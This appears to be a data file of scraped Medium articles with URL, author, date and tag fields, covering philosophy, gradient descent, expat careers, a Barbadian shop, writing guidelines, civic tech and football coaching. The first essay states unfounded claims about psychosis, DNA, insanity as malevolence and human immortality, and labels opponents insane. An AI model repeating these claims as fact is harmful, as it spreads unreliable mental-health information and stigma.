Aristotle thought that we should define our words by ‘class’ and ‘characteristic’, while modern researchers of scientism think we should define our words by their ‘operation’. An operational definition is based on what we need to do to experience the reality signified or symbolized by the word being defined. Unfortunately, Aristotle failed to understand and scientism’s modern researchers fail to understand that classes, characteristics, and operations are misleading if we use them as the basis of our ability to define because they are not the foundation by which we are actually defining our words.
The foundation by which a person defines all of his (or her) words is either his superstitious irrational ultimate ‘Truth’ or his realistic rational ultimate Truth.
Sanity, Insanity, and Oversensitivity
A sane person is a benevolent person because sanity is benevolence. An insane person is a malevolent person because insanity is malevolence.
People who suffer from oversensitivity (commonly and mistakenly referred to as psychosis) are not necessarily insane because, although they are deluded, they might not have a malevolent motive or intent to force others to comply with their demands; therefore, these mentally disrupted (not mentally ‘ill’) people are usually more at risk or at danger from a lot of so-called ‘normal’ people, than they are risky or dangerous to them. The truth is that the terrible treatment they receive from so-called ‘normal’ people when they are acting strangely because of their delusions leads them become dangerous to the bodies of normal people as well as their own bodies.
Mentally disrupted people differ from the normal population because their bodies usually have a faulty DNA sequence which predisposes their minds to become disrupted when they experience an intensely stressful situation. Mentally disrupted people are not abnormal because they are not mentally ‘ill’. Their bodies are ill because it is the faulty DNA sequence in their body that adversely affects their minds so that their minds become mentally disrupted and they experience delusions. Fortunately, medications can usually restore the chemical balance of a mentally disrupted person’s brain so that his mind is not adversely affected anymore and his mind ceases to be mentally disrupted.
The terrible treatment of mentally disrupted people is usually the result of the stigmatization of them as dangerous. Mentally disrupted people are no more dangerous than anyone else if they are treated with kindness and respect when they are deluded. Normal people who treat mentally disrupted people as if they were dangerous do not realize that they are stigmatizing them as dangerous because these normal people are afraid of their own insanity. Normal people are afraid that they are in danger from mentally disrupted people because mentally disrupted people remind these normal people that they are mentally disturbed. The danger most normal people fear is their own mental disturbance, not mentally disrupted people. Consequently, any normal person who treats a mentally disrupted person badly is simply afraid to face his or her own mental disturbance.
Irrational Ultimate ‘Truths’ and the Rational Ultimate Truth
Some linguists are not only insane, they are deluded, because their irrational ultimate ‘Truth’ is either predeterminism (all is destined to happen as it must), determinism (all is fated to happen as it must), or compatibilism (all is determined to happen, yet also happens with a degree of freedom). Insane linguists shun the rational ultimate Truth of libertarianism (all happens in absolutely freedom by our absolutely free use of the Source and Activator’s Will in tandem with It as well as happens by the Source and Activator’s absolutely free use of Its Will on Its own).
Insane linguists shun libertarianism because they are afraid to be absolutely free. They don’t want to admit that they are absolutely free because they fear taking total responsibility for how and who they need to be.
What makes insane linguists dangerous to everyone is that their minds are not disrupted by their bodies, like people who suffer from oversensitivity; rather, their minds are disturbed by their irresponsibility which is directly related to their irrational ultimate ‘Truth’. Of course, people who have absolute freedom as their rational ultimate Truth are not necessarily responsible because they may be using their absolute freedom as their excuse to be licentious, instead of their reason to be liberated.
The insane norm for people in our modern world is to delusionally believe in the principles, rules, or laws that their authorities have invented so that they are in conflict when they try to reconcile their irrational ultimate ‘Truth’ of predeterminism, determinism, or compatibilism with their unpredictable and continually changing actions and behaviours. Like the insane linguists from whom they have taken their lead, normal people usually fail to realize that their needs change with their situations or contexts; therefore they fail to understand that we all need to improvise our arrangement and interrelations of words in our phrases and sentences to suit our changing needs in different situations or contexts. Our words simply can’t be effectively arranged and interrelated if we use principles, rules, or laws to arrange and interrelate them because the principles, rules, or laws of grammar, like our societies’ behavioural principles, rules, or laws of conduct, are the same for every situation or context; therefore, the laws of our institutions of justice are just as unrealistically applied as the laws of the insane linguist’s prescriptive or normative grammar.
Some linguists are insane because they think we have a need for principles, rules, or laws. We don’t have a need for principles, rules, or laws because we are absolutely free in our use of our psychological worlds (our abilities and faculties); therefore, our use of our psychological worlds is not fated and destined by the principles, rules, or laws of a mythical ‘Creator’ who demands that we obey his principles, rules, or laws or else he will kill us. Nor is our use of our psychological worlds fated by the principles, rules, and laws which scientism’s researchers claim have always existed in Nature so that we are condemned to competitively struggle for survival, a competition thought by mortalists to be meaningless because they believe that we only survive as a postponement of death, not a transcendence of death.
We act and behave in relation to our needs, not in relation to the principles, rules, or laws that we make up to suit our whims. A sane linguist realizes that God is the Source as well as understands that the Source instinctively uses Its Will to evolve, grow, and develop all in accord with Its needs. A sane linguist understands that there are no principles, rules, or laws that were created by a Creator as well as understands that there are no principles, rules, or laws that have always existed in Nature. A sane linguist realizes that only our developed needs are effective, not our invented principles, rules, or laws. A sane linguist realizes that he is immortal because he understands that he was developed from and by the immortal Source; therefore, he understands that he has a need to develop wisdom, instead of concentrating all his attention on survival because the desire to survive is neurotic considering that we cannot die. After all, why desire to survive if you cannot die?
A linguist is able to begin his journey to wisdom by understanding that he is absolutely free in his expression of his emoting, imaging, imagining, sensing, perceiving, thinking, reasoning, understanding, intuiting, cognizing, recognizing, feeling, awaring, consciousing, remembering, anticipating, inventing, identifying, and naming. Although the goal of wisdom can be reached, the journey never ends because the linguist will always need to contend with his bottomless lack of knowledge so that he can continually deepen and expand his wisdom in relation to his always increasing knowledge.
It pays to be modest because we all lack omniscience (all knowing and all-knowledge) nor will we ever be omniscient because we cannot be everywhere concurrently so that omniscience could be ours. Scientism’s researchers would have you believe that they are on the brink of omniscience because they are vain. These researchers suffer from the mistaken hypothesis that they can fix their principles, rules, or laws in an equation which they suppose they will be able to use to fix our continually changing Universe in an unchanging pattern. These researchers fail to understand that that our infinite Universe does not occur in an unchanging pattern because our infinite Universe is not rigidly patterned by the lawful design of a Creator nor rigidly patterned by the laws of Nature because the Source is always instinctively using its Will in this infinite Universal pattern so that this pattern is continually changing in accord with the needs of the Source.
The vanity of scientism’s insane researchers and insane linguists is shown by their failure to realize that we lack the knowledge of the infinite details of the Universe as well as the infinite details of the unbounded Cosmos-Heaven in which the infinite Universe exists. They fail to realize that the Universe is infinite as well as fail to understand that we shall always lack the knowledge of the Universal infinite details and the infinite details of the unbounded Cosmos-Heaven because infinity cannot be contained by our finite memory store.
These insane researchers and linguists are blind to the danger of their delusional belief that omniscience will soon be theirs. The danger is that their belief in their own impending omniscience prevents them from having the modesty necessary to question their own irrational ultimate ‘Truth’ of predeterminism, determinism, or compatibilism which are all attempts to escape from libertarianism. Consequently, they invented principles, rules, and laws to justify their belief in their irrational ultimate ‘Truth’ so that they would not have to accept the rational ultimate Truth of libertarianism.
These insane researchers and insane linguists do not want to understand that principles, rules, or laws have no objective reality except as words on paper. Instead, they use their belief that their actions and behaviours are determined by the Creator’s laws or by Nature’s laws so that they can rationalize that they had no choice in making weapons of mass destruction.
Somewhere in their development, these insane researchers and linguists lost their way because they settled for an illusory irrational ultimate ‘Truth’, instead of continuing to question what the ultimate Truth is until they had subjectively proven what the rational ultimate Truth is. These insane people have used their propaganda to convince the majority of people on earth that we are not absolutely free to use our abilities; therefore, we fail to understand that we are absolutely free in our ability to act in accord with our needs and sane desires, while guarding against our disabling tendency to licentiously use our abilities to act out our insane desires.
Insane people try to show that we are not absolutely free by referring to the fact that our bodies can be confined, restricted in their movements, and killed. They don’t want to understand that the person who is living his body and has life in his body is absolutely free in his use of his psychological world, even though he is only relatively free in his use of his objective body, because these insane people have decided in advance that they don’t want to be absolutely free.
Insane linguists don’t want to be absolutely free because they don’t want to be totally responsible for how and who they need to be; therefore, they are unreasonable because they don’t want to recognize that they made a decision to escape from their absolute freedom which is also why insane linguists are absurd as well as malevolent.
References
1. Darwin, C. 2019. On the Origin of the Species by Means of Natural Selection. London, England: Arcturus Holdings Limited.
2. Fromm, E. 1969. Escape from Freedom. New York, New York: Avon Books.
3. Hayakawa, S. I. 1963. Language in Thought and Action. New York, New York: Harcourt Brace Jovanovich, Inc.
4. Hayakawa, S.I. 1943. The Use and Misuse of Language. New York, New York: Fawcett World Library.
5. Landau, S. I. 1968. Standard College Dictionary. Sidney I. Landau: Editor in Chief. New York, New York: Funk & Wagnalls.
6. Sartre, J. 1953. Being and Nothingness. Washington Square Press Edition. New York, New York: Pocket Books.
7. Strunk, Jr. W. and White, E.B. 1972. The Elements of Style. New York, New York: Macmillian Publishing Co., Inc. | https://medium.com/illumination-curated/why-insane-linguists-are-absurd-15422f838f98 | ['Daryl Mowat'] | 2020-11-24 14:42:56.397000+00:00 | ['Words', 'Truth', 'Linguistics', 'Logic', 'Grammar'] |
Gradient Descent — A Powerful Optimization tool for Data Scientist | Model Objective
Below we will preface the article with a simple introduction of the structure of the model optimization problem (The notation is not robust).
Suppose you have the following model:
Where f(.) is a function that takes features and parameters as input values. The function then returns an output. The parameter value (β) is not known to us, therefore we will need to learn the values from the data.
We want to find the best parameters (β) so that our predictions (ŷ) are close to the truth (y). To accomplish the task, we would minimize a loss function. β^ is the argument that minimizes the loss function L(.).
Minimizing the cost function
The structure of the loss function will depend on the problem you are trying to solve. Some popular loss functions are RMSE, RSS, and Cross- entropy.
Note: Identifying the structure of the loss function is beyond the scope of the article.
Direct Method
Photo by Mark König on Unsplash
The direct method of minimizing a cost function is ideal because you can be certain that the answer you receive will be the optimal solution. Take for example the simple linear regression below.
Photo by Steven Loaiza on Latex
The objective of the model is to solve for the optimal solution to the β parameters. Linear regression has a well-defined closed-form solution for the loss function. The parameters and can be solved directly.
Photo by Steven Loaiza on Latex
But, not every loss function has a direct solution. Therefore, we need other methods to solve the parameter values.
Approximation Method
There are complex formulas that are not easy to solve for the unknown parameters. On the other hand, even if a parameter can be solved, the time complexity of performing the calculations could take a long time. There are many approximation methods, but we will focus on gradient descent.
We deem the method an approximation because we are trying to get close to the true parameter values that will minimize a loss function. There can be times when the algorithm converges on a local solution instead of a global solution (more on that later). | https://towardsdatascience.com/gradient-descent-a-powerful-optimization-tool-for-data-scientist-89f48e8401c6 | ['Steven Loaiza'] | 2020-12-27 19:43:38.104000+00:00 | ['Python', 'Machine Learning', 'Algorithms', 'Optimization'] |
One Job Leads to the Next; the Importance of Having ‘a Foot in the Door’ | After about six months in my new job in Taipei it was Chinese New Year, in February. This meant that the office would close for a whole week!
I was hired locally and that meant that I had no right to annual leave in the first year. As a European, I found that unbelievable. How could anyone be productive in their job, every single day for a whole year! Clearly, that way of thinking came from a cultural background where results, productivity and efficiency are valued much more highly than the number of hours sitting in the office.
“You are taking too much leave”
When I signed my contract, I was told that it was okay to take unpaid leave. I was fine with that because I was working for my professional fulfilment, not for financial reasons. However, when it came to asking for unpaid leave, it was met with reluctance. I had taken some unpaid leave around Christmas which was not welcomed with great enthusiasm. When I subsequently asked for an additional day to add to the Chinese New Year week because of the flight schedule to our planned holiday destination, my boss signed the form and gave it back to me with the comment: “You are taking too much leave”.
I felt bad. Clearly, I still hadn’t adjusted to the Chinese work ethic. But I needed that holiday. After six months living and working in Taipei, I was exhausted. All the excitement, anxieties and challenges of living in a new country, getting used to a totally different culture, working with only Taiwanese colleagues and making new friends had taken a lot of energy. I didn’t realise how tired I actually was until we arrived at our holiday destination, Boracay, an exotic car-free island in the Philippines.
Our hotel was a five-minute walk from the beach but the first three days we didn’t even make it to the beach. We had just about enough energy to walk the 20 meters from our hotel room to the pool and install ourselves on the sun loungers.
This was a perfect environment in which to think back on the previous six months of our lives
After three days of complete rest we started exploring the beach and the rest of the island. It was lovely and idyllic, completely different from the big city we were living in. The pace was nice and slow and everybody around us was just there to relax. This was a perfect environment in which to think back on the previous six months of our lives.
To my own surprise, I realised, on reflection, that my job was not very fulfilling. Wow, that was an insight that I hadn’t expected.
But it was true. I was hired in the executive search department to penetrate the Western community and find new clients. However, I was also expected to find the perfect candidates who were to be local Taiwanese people. That was where the problem lay. I did not have a network or speak the language, so it was very hard for me to find the right people. Our department assistant had helped me out several times when I called a potential candidate and the phone was answered by a family member who didn’t speak English. But I couldn’t rely on her for every call. The way the department worked was ‘every man (woman) for himself’ and there was no sharing of clients and candidates. There was no way I would be able to be effective and successful in this set-up.
I decided, during that holiday, that I wanted to do something else. But what?
“There is another option”
As this approach had been successful before, I decided to use my contacts. Back in the office I walked over to the audit department to see the person who had introduced me to my current job. Of course, he wanted to know how things were and I told him what I had discovered. Working in a similar environment, he completely understood and to my surprise he said: “There is another option”.
He told me that the firm’s Asia Pacific Regional office was housed in the same building. Something I hadn’t noticed because all the signs were in Chinese only and the regional office had very little to do with this local office. He hadn’t mentioned it before because his wife had worked there for a few months and had left in horror because the Regional head was a very difficult person to work for. He had wanted to protect me from him. Ah, sweet.
But I didn’t care. I would deal with him. My current job was not going to get any better and I had already decided that I wanted to leave. I asked my contact to introduce me and I was lucky that the regional head could fit me in within a few days.
I went downstairs to the fourth floor, feeling excited and hopeful. The regional office was tiny compared to the local office upstairs. It only occupied a corner of the building and there were six staff members, three Taiwanese and three Western. The Regional head was British and we had a very pleasant chat. Could I imagine him being difficult? Perhaps a little, but it was such a relief to be in a more Western environment.
The Regional head was interested in taking me on because his HR team of two was located in Hong Kong, which was inconvenient, and one of them was leaving. The fact that I was working in the local office impressed him. He knew that as an expat partner I didn’t need to work but I was clearly serious about my career. He asked me how much the local office was paying me and when I told him he shook his head. “Shocking” he said, which was music to my ears. And, yes, they also kept European standards with regards to annual leave. Hurray!
The elevator would take too long so I ran back up the stairs, full of excitement, straight into my boss’s office. I was still panting when I told him of my dilemma to succeed in the role and that I was offered a job in the regional office. He was perhaps a little insulted that I had decided to leave but he must have noticed my lack of success in finding candidates. He probably had more patience than I did.
It felt like I was coming home
I worked out my notice period and moved down, to the fourth floor. It felt like I was coming home. After six months of having worked in a completely Taiwanese environment, I had landed in a mixed office where the Anglo-Saxon business culture was leading. Clearly, that was much closer to home for me.
I never regretted my first six months in the local office. It was a great experience. I had taken the job and had accepted a low salary and if I hadn’t done that, I would never have found the next one. My job in the local office was a foot in the door. I was accepted as a serious member of the business community and that created opportunities.
I would work in the Asia Pacific office for the next three years. And, was the British boss a difficult person to work for? Oh, yes.
Wendela Elsen has been an expat partner for more than 20 years. She is originally from the Netherlands and has lived in Taiwan, Japan and now in the UK. She has been professionally active for most of that time in different capacities. She now works as a coach and helps expat partners find meaningful and fulfilling ways of using their professional skills and experiences, be it in paid work or otherwise. You can find out more about her work on www.openrabbit.com | https://medium.com/the-expat-chronicles/one-job-leads-to-the-next-the-importance-of-having-a-foot-in-the-door-89e1c68db824 | ['Wendela Elsen'] | 2021-01-19 13:49:19.433000+00:00 | ['Expat Life', 'Taiwan', 'Career Development', 'Careers', 'Expat'] |
Ah Bajan Ting: Old Time Village Shop | Ah Bajan Ting: Old Time Village Shop
The Legacy of The Hinkson Shop
By Krystal Penny Bowen
Originally published in The Barbados Advocate
The village shop was one of the three pillars of Barbadian society. Like the church and the school, it was a space for people to bond. It was also an essential service to the development of the community. But, the village shop is slowly dying and it is being replaced by the supermarket and minimart models of business. The village shops which have survived are usually still in their original spots and family-owned.
In the St. Stephen's Hill/Clevedale area, for almost fifty years, Hinkson's shop provided all the basic food supplies to a densely urban community. The Black Rock St.Michael business which opened in the early 1950s sold meat-chicken, salted cod and pigtail, rice, flour, butter (served in paper and sold by the ounce), biscuits (Shirleys and Eclipse) stored in a tin, sweeties, soft drink, and of course, rum.
On Friday, November 13, The Barbados Advocate visited the Hinkson's Shop to chat with owners, Heather Hinkson and her daughter, Sigmanda Hinkson. The grey shop is now bright baby pink and the structure has not changed much since its early days. Sigmanda credits her ten-year-old daughter, Aarys for recommending the new colour scheme for the business. The interior is nostalgic as it has the traditional glass case to display the baked homemade goods. In the family, Sigmanda is the baker and she always ensures the shop has fresh coconut cakes and as it is November, Bajan conkies. She also makes pone, banana bread and sweet bread.
The Start of A Family Business
Heather explained that her father, Monty Hinkson, and mother, Phyllis Hinkson initially managed the shop. She said her father worked for the Transport Board and her mother would open the shop around 8 am to serve the people in the village. It was a team effort, her mother would take a break and her father would come in and assist with the customers' requests. In the household, Heather along with her siblings, Harcourt, Hazel, and cousin, Herbert also helped with the business.
A Change in Distribution
In the early days, items like sugar, flour were delivered in large crocus bags and distributed using a scoop. The shop has a scale where these foods were weighed. Soft drinks were served in a glass bottle. Today, there are plastic containers and bags for items like rice, flour, and sugar, soft drinks all of them now come in plastics or PET bottles but the Hinkson family still has that scale. Unfortunately, it cannot be used since the tray that was used to hold the rice or whatever was being weighed was damaged.
A Mini Museum
Sigmanda said that when the children visit the shop, she and her mother would show them other old fashioned items and how they worked much to their delight. For the older generation who remembers the old-time shop, there is a wooden bench in the corner that holds pleasant memories. Heather said it was a place where people would sit and chat. She explained that in those days, there were no social media and people came to the shop to hear the latest news.
"When you talk to the older folks from the district, they always say, " I remember spending many days on the bench...people still come in and sit down occasionally," said Heather.
Growing and Evolving
With both Monty and Phyllis gone, Heather and her daughter are keeping the Hinkson's legacy alive. But they have plans to help the business grow. They continue to sell the traditional food items and beverages but they are also selling fresh juices and other products which one may not normally see in the village shop. | https://medium.com/@krystalpennybowen/ah-bajan-ting-old-time-village-shop-2b55a69c8715 | ['Krystal Penny Bowen'] | 2020-11-27 10:30:29.329000+00:00 | ['History', 'Women In Business', 'Village Life', 'Barbados Culture', 'Bajan'] |
How to Write for Home Sweet Home | How to Write for Home Sweet Home
Guidelines and how to submit your work
Photo by Dustin Lee on Unsplash
Welcome to Home Sweet Home!
Before submitting your work, please take the time to read the guidelines below. You may also find our FAQ section helpful.
About Us
Our little family. Photo by Laura Fox.
HSH is run by myself and my husband, David Fox. We have a daughter called Imogen, but we call her Immy for short.
I have mental health problems and write about my experiences as a mother who is recovering from postnatal depression and healing from a traumatic childhood. I hope I can help other parents with similar experiences feel less alone.
David has cerebral palsy and writes about parenting with a physical disability. Not only does this help other parents with disabilities feel less alone, but it also challenges the stereotypes around people living with a physical disability.
About Home Sweet Home
We are a parenting publication and welcome stories on parenting experiences. Whether you’re a parent to be, a single parent, co-parenting, have adopted children, grandchildren, step-children…we want to hear from you!
We realise not everyone is a parent but still have great stories to tell. If you want to write about your hopes for when you become a parent or about family in general, you are very welcome to.
Submission Guidelines
Stories must be tagged with at least one of the following:
Family
Parenting
Special Needs
Education — note that this needs to come from a parenting or family angle. There are other publications specifically for pieces on education.
Mental Health — note that this needs to come from a parenting or family angle. There are other publications specifically for pieces on mental health.
If your piece is in response to the monthly prompt, please include the tag “prompt”.
We pride ourselves on being a publication where readers and writers feel supported. Parents often feel judged and most of our readers are parents. Please make sure your work isn’t of a judging or shaming nature. The sort of articles we accept are:
Well-written with limited spelling mistakes and grammatical errors. We understand it’s easy to miss things in your own writing (especially if you are distracted by parenting duties) so one or two errors are fine. But we expect you to proofread your own work before you submit.
Have something to teach the reader. We don’t accept drafts that are like diary entries. You need to write for the reader . Is your piece relatable? And if it’s about a unique issue, does it have valuable knowledge to give to the reader? Is there an actionable take away message?
. Is your piece relatable? And if it’s about a unique issue, does it have valuable knowledge to give to the reader? Is there an actionable take away message? Are specific to parenting and family. We do not accept drafts that have nothing to do with these topics.
Have links to sources. Some articles may not need these, but if you are stating a point such as “children benefit from their parents reading to them” then you need to find a source to back that up.
Have specific titles that tell the reader exactly what the article is about. People are less likely to click in vague titles such as “Divorce.” A better title would be “How Divorce Has Impacted My Family.”
We do not accept poetry.
Please allow up to 48 hours for your draft to be published, pending any changes an editor asks you to make. This does not include weekends. The editors for this publication are Laura Fox, David Fox, and Mason Sabre. If you any changes need to be made to your draft, we will leave private notes explaining how you can make these changes.
We have a section on our homepage called “Best of” where we select the best articles of the month. If you would like to read examples of articles that fit our publication, we recommend you browse that section.
As always, follow Medium’s Curation Guidelines when submitting your work.
How to Submit
If you would like to write for us, please send a link to an unpublished draft to laurafoxwriter@gmail.com. We do not accept pieces that are already published.
Please allow up to seven days for your draft to be reviewed.
If your draft is of good quality and fits our publication, we will add you as a writer. This means you can add your Medium drafts to our publication and we will publish them for you, pending any changes you need to make.
If you have any questions that have not been answered in our FAQ section, please comment below and we will happily answer them.
We are looking forward to reading your stories! | https://medium.com/home-sweet-home/how-to-write-for-home-sweet-home-b2795076d783 | ['Laura Fox'] | 2020-10-02 12:25:06.696000+00:00 | ['Submission Guidelines'] |
Memories Spent and Memories Lost | If I stand in the balcony of our old house, I can still see the empty swing swinging slightly in the breeze. If I close my eyes, I can see a grandfather sitting in the swing, his grandchild squeezed behind him, pretending to be the master of the boat guiding it through tumultuous waters.
Oh, how much I wish the child knew their way now!
Evening falls, the blowing of a conch shell is heard. Warm air with a hint of burning incense stick wafts up to my nose. It’s the time I await eagerly, to talk to the grandmother next door while she washes the clothes.
But she doesn’t come. Not anymore.
Now she’s in her room, locked in a place unreachable to man, staring at the buzzing tv with a faraway look, waiting for the day to join her already dead son.
The sky darkens, and I think I can see the familiar white hair blowing in the wind, the all-too-known toothless smile.
Until I blink.
And she’s gone.
The road buzzes with people, children crowd to the phuchka vendor. The radio in the laundry shop across the street cackles and plays an old Bollywood song. Sound of chow mein sizzling on the pan.
Everything is the same. And everything isn’t.
The damp smell of the earth warns of impending rain.
People hurry for shelter. But I welcome it. I wonder if it smelled the same back in Bangladesh, back when Dadai used to go to school on rainy days in a boat. Did he ever look up at the rain falling down from the sky and think of the people in his life? Look back at moments spent?
I accompany Dadai on his evening walk when he comes to visit us. He points out to me the houses of people he knew. People who were his people from home. I look at the dark shacks, the people living there mostly gone. I see his eyes dreaming of days past, of memories spent and memories lost.
I stop in front of a pond. The black water stands still, like time. Two coconut trees stand at the edge of the water, their leaves brushing each other as they lean down to the surface — two friends watching the play of time.
The wind is quiet, unlike my mind which is rushing, roaring like moving waters today. It is taking me to places, memories I wanted to forget. Pain — the pain of losing people stings at the back of my mind like saltwater on a wound.
A lump forms in my throat. My chest burns with the memory of my loved ones, of people met and people lost. I wonder if the river feels the same?
Meeting friends, changing forms, only to leave them and move along —
I close my eyes. The cloud rumbles overhead. The river in me longs to take its form and flow, flow like unrestrained waters from the hills like it’s meant to be —
It’s drizzling now, the cold raindrops kissing my face like the warmth of my long-gone friends.
I walk up to the last step of the ghat and kneel to the water level. Carefully taking out a paper boat from my pocket, I caress it, remembering the times I used to sail paper boats in the rain, before floating it in the water.
The tiny boat flutters and shakes, the wind taking it away from me. | https://medium.com/prismnpen/memories-spent-and-memories-lost-f9232a969f66 | ['Artemis Shishir'] | 2020-09-26 08:17:08.844000+00:00 | ['Fiction', 'Memories', 'Loss', 'LGBTQ', 'Grief'] |
Showcase 2019: Delivering digital at a national scale with Daniel Tse | The Code for Canada Showcase is a celebration of civic tech in Canada. What does civic tech mean to you?
We’re in an age where it’s no longer a question of “can technology do this?” Today, more and more, what we have is technology in search of problems. Civic tech is an opportunity to find real problems and solve them with technology in an inclusive manner.
How does the theme of civic tech or the values of the civic tech movement relate to your work?
Something I’ve learned at the Canadian Digital Service is that two heads are better than one. One of the things our team embraced while working with Veterans Affairs Canada was to pair up developers and non-developers to build things together. This not only helped build a more inclusive product, but helped the team develop more empathy for each other. At its core, civic tech brings people (both tech and non-tech) together to solve problems.
What’s unique about civic tech and digital government in Canada? Are there unique opportunities? Unique challenges?
Canada is geographically large and comes with a huge diversity of cultures, which can be a challenge or an opportunity when you’re developing products and services intended to be accessible for all Canadians from your first release. Typically, in startups or private industry you’re told to niche down, pick a really small, tiny slice of your target market. In the government your niche automatically starts with two languages and accessibility requirements. So, you can view the Official Languages Act and accessibility as a challenge — but I like to view it as a call to action and an opportunity to be inclusive from the start.
“You can view the Official Languages Act and accessibility as a challenge — but I like to view it as a call to action and an opportunity to be inclusive from the start.”
The Showcase brings together public servants, entrepreneurs, community organizers and residents under the banner of civic tech. From your perspective, why is it important to get people from across sectors in the same room?
If we believe modern day problems require modern day solutions, then inclusive problems require inclusive teams. We cannot continue to solve things in isolation. The risk of focusing on the wrong thing, or repeating the same mistakes increases exponentially when we don’t work as an inclusive team.
What are you most excited about for the Showcase this year?
As a former fellow, I’m looking forward to seeing how the momentum is building. It’s so interesting to see how some of the challenges that we faced as the inaugural fellows are now solved on day one for today’s fellows. I’m also just really excited to see the creative things they’ve built to address new and different public service challenges. | https://medium.com/code-for-canada/showcase-2019-delivering-digital-at-a-national-scale-with-daniel-tse-4bf55f20bb6d | ['Luke Simcoe'] | 2019-07-11 17:31:02.787000+00:00 | ['Showcase', 'Code For Canada', 'Digital Government', 'Civictech'] |
LAMB Chrome extension wallet will release soon | The first chrome extension wallet to support Lambda storage network. Google Chrome is the most popular browser nowadays, and it has powerful plugin system. The plugin wallet configuration is simple, installation and layout are very simple and convenient. At the same time, many blockchain applications currently have plugin wallets support. Hence, the Lambda Chrome extension wallet will be convenience for users and opened up Lambda ecological transactions and blueprint.
Lambda Wallet Chrome extension version brings an overall Lambda ecosystem experience to web users. It is a perfect web entry for blockchain space, and it complements the defects of web side of Lambda ecosystem. Web wallet will also be a blockchain applications’ indispensable fundamental tools. In the future, Lambda will continue to update wallet functions and user experience. Welcome all Lambda community members bring friends to use the Beta version of Lambda Chrome extension wallet and share more suggestions to us!
The LAMB Chrome extention wallet create by Lambda technology community which will be launched soon. Please follow our Weibo and other Official channels. | https://medium.com/lambdaofficial/lamb-chrome-extension-wallet-will-release-soon-adab7b2b80d2 | [] | 2020-12-03 09:52:23.332000+00:00 | ['Blockchain', 'Blockchain Development', 'Wallet'] |
Node.js Coding Style Guidelines | Node.js Coding Style Guidelines
Make your code readable to others
Software developers are like lone wolves who prefer to work as individuals rather than in a group. I too come in that category. This can sometimes create problems when the need to work in groups arises in a project.
There are both pros and cons involved when working in groups. On the plus side, there are more insights available to a problem which can help get to a better solution, but at the same time there can be collaboration issues when one developer has to go through another developer’s code to debug or review it.
Each individual has his/her own way of writing code and more often than not, there is a high degree of variation among a group of developers. To avoid such problems when working in a team, most of the programming language communities follow standard coding guidelines. By following these guidelines every developer can write code in a specific way that is known to their teammates. This practice can help teams save time reading the code written by other members.
This article is a guide for writing consistent and aesthetically pleasing Node.js code. It is inspired by what is popular within the community, and also features some personal opinions. | https://medium.com/swlh/node-js-coding-style-guidelines-74a20d00c40b | ['Tarun Gupta'] | 2020-12-25 14:44:42.530000+00:00 | ['JavaScript', 'Programming Tips', 'Nodejs', 'Programming', 'Javascript Tips'] |
Introducing Havas Emerge | Introducing Havas Emerge
As part of our North America Commit to Change Plan, this week we are proud to announce Havas Emerge, a new program that brings together 27 diverse, emerging leaders from Havas NA agencies. The 9-month, 3-module learning and development program is designed to accelerate the early careers of Asian, Black, Hispanic, Indigenous, and other non-white ethnicities — with the goal to increase representation in management roles across Havas’ North American agencies.
The inaugural class is comprised of leaders from all 3 Havas Group networks, 21 agencies, 8 cities, and 14 departments. Through the program, they will gain an understanding of their own leadership, inspiration from thought leaders, a development plan to guide their career, and a community to grow along with.
Meet the first class: | https://medium.com/havas-all-in/introducing-havas-emerge-73f4ed39236d | ['Havas Group'] | 2020-12-09 22:33:53.201000+00:00 | ['Training And Development', 'Management And Leadership', 'Empowerment Program', 'Diversity And Inclusion', 'Management Development'] |
Does Firing Your Football Coach Lead to Success? We Don’t Think So. | There is an old adage that states head coaches are hired to be fired, and a vast majority of the time, this is true. In the NFL over the past couple of decades, the average tenure of a head coach has been 3.3 years. According to Business Insider, that average is higher among FBS college football head coaches, but not by much (3.8 years).
Another way to examine coaching turnover is to calculate how many NFL and FBS head coaching changes are made each year. The following table shows data from the last 10 NFL seasons.
We see that there have been 65 coaching changes during this time period, an average of 6.5 per year, which equates to 20.3 percent head coaching turnover each season.
We now turn our attention to the same data for FBS college football.
We see that there have been 241 coaching changes during this time period, an average of 24.1 per year, which equates to 18.5 percent head coaching turnover each season.
For both professional and college football, that is a significant amount of head coaching turnover. The question is: how successful have these changes been?
First, let’s take a look at the NFL. Since the average head coaching tenure is 3.3 years, we’ve examined all the head coaches over the past decade who had a tenure of 3 years or less, and compared their record to the record of their successor over the same period of time.
Green indicates the successor had a higher winning percentage, red indicates the successor had a lower winning percentage.
At first glance, these results look pretty good. There are 38 coaching changes in our table, and 23 of those moves (60.5%) resulted in improvement. However, a closer look reveals something quite different.
When a team makes a head coaching change, they are not looking to take a team with a losing record and improve it to a slightly better losing record. Of the 23 “improvements” noted in our table, 13 of those coaches still had a losing (or even) record over the same number of years that their predecessor was given.
If we consider a successful coaching change, one that results in a winning record (and a better record than the previous coach), only 10 (26.3%) of these qualify.
The following table includes data for FBS college football teams. The teams listed here made the most coaching changes over the past 10–15 years, and the chart includes coaches with a tenure of 5 years or less.
Note: there were a number of schools not included here that experienced as many or more coaching changes than the schools listed in the chart, but those were typically smaller programs that had a consistent pattern of losing head coaches to larger programs, so those changes can be ignored for the purposes of this study.
Of the 23 coaching changes listed here, 12 of them (52.2%) resulted in improvement. However, much like the NFL data above, that percentage drops significantly if we use the “winning record” criteria described previously.
Only 6 (26.1%) of the FBS coaching changes resulted in a better record than the previous coach, and a winning record.
The fact that so few head coaching changes result in a winning record and improvement over the previous regime points to some serious issues in the pro and college football hiring process. So we ask the question, why are football coaches fired so quickly over and over if the data says that’s wrong?
Coaches are completely aware of the fact that performance is everything; if they don’t produce, they will be fired. And, they probably won’t be given very many years to prove themselves as we have seen from the data.
This cycle produces what we call a ‘culture of fear’ in the coaching profession that no other industry deals with on a daily basis. Coaches know they are on a short leash from the day they are hired, and this lack of job security and peace of mind creates tremendous pressure and anxiety among head football coaches.
So we ask, is mental health important for NFL and college football coaches?
The numbers suggest that the current system of hiring and firing is not working.
The initial step is to hire the right person to begin with — more specifically, hire head coaches for the right reasons. Too often coaches are hired for reasons outside of what the right ‘fit’ for the organization might be.
A stellar win-loss record, a family history of coaching success, a history with successful teams and/or coaches, and personal or professional connections are all criteria currently used in the hiring of coaches.
Is this right?
Having won elsewhere, having the right last name, having been an assistant coach under a great head coach or for a great team, or having a comfort level with someone because you’ve worked with them before are not always good indicators of how successful a head coaching hire will be. Even something as obvious as past success can be misleading if not thoroughly investigated and taken into account with many other factors.
Hiring the right head coach is not an exact science by any means, but the process is made even more difficult by using criteria that is often more beneficial for public relations or self serving to the administration (Ie., selling the hire to a fan base or to boosters) or networking (working with your friends in the profession) than it is for producing on the field.
So why doesn’t the administration have more patience?
